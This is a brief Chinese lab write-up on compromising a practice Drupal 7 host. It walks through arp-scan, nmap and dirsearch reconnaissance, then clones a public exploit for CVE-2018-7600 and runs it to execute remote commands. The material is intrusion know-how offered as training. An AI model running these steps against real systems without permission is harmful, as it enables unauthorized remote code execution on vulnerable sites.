1.安装并且配置靶场网络
2.进行信息收集
首先在kali里面用arp-scan -l
3.扫描网段
可以看到我们应该去扫描一下 192.168.126.0/24 网段
使用命令 nmap 192.168.126.0/24 -O
可以扫描到这样的ip的内容,它开启了22和80端口 可见有 linux的ssh服务、web页面服务
4.目录扫描
这样的话我们就扫描一下这个ip 192.168.126.151 web的目录
apt-get install dirsearch 先安装一下 dirsearch
接下来扫描目录 dirsearch -u http://192.168.126.151
5.进入web页面
发现有这样的目录 http://192.168.126.151/drupal/ ok访问一下去 来到这样的页面
思路一:
这里登录框并没有弱口令以及sql注入漏洞 ,于是再扫描一下drupal下的目录
可以在这些响应成功的目录下 进去看看 在这里 drupal/CHANGELOG.txt 可以看到版本
思路二:
利用插件去看一下 看到了内容管理系统(CMS) drupat7
于是可以去网上找一下此版本是否存在exp 最后找到该版本的漏洞 CVE-2018-7600
网上下载exp后,用kali操作
在github中下载该漏洞的exp
git clone https://github.com/pimps/CVE-2018-7600.git
再kali 的cve-2018-7600 下执行
python3 drupa7-CVE-2018-7600.py http://192.168.x.x/drupal/ -c ls (Linux系统命令)
即远程命令执行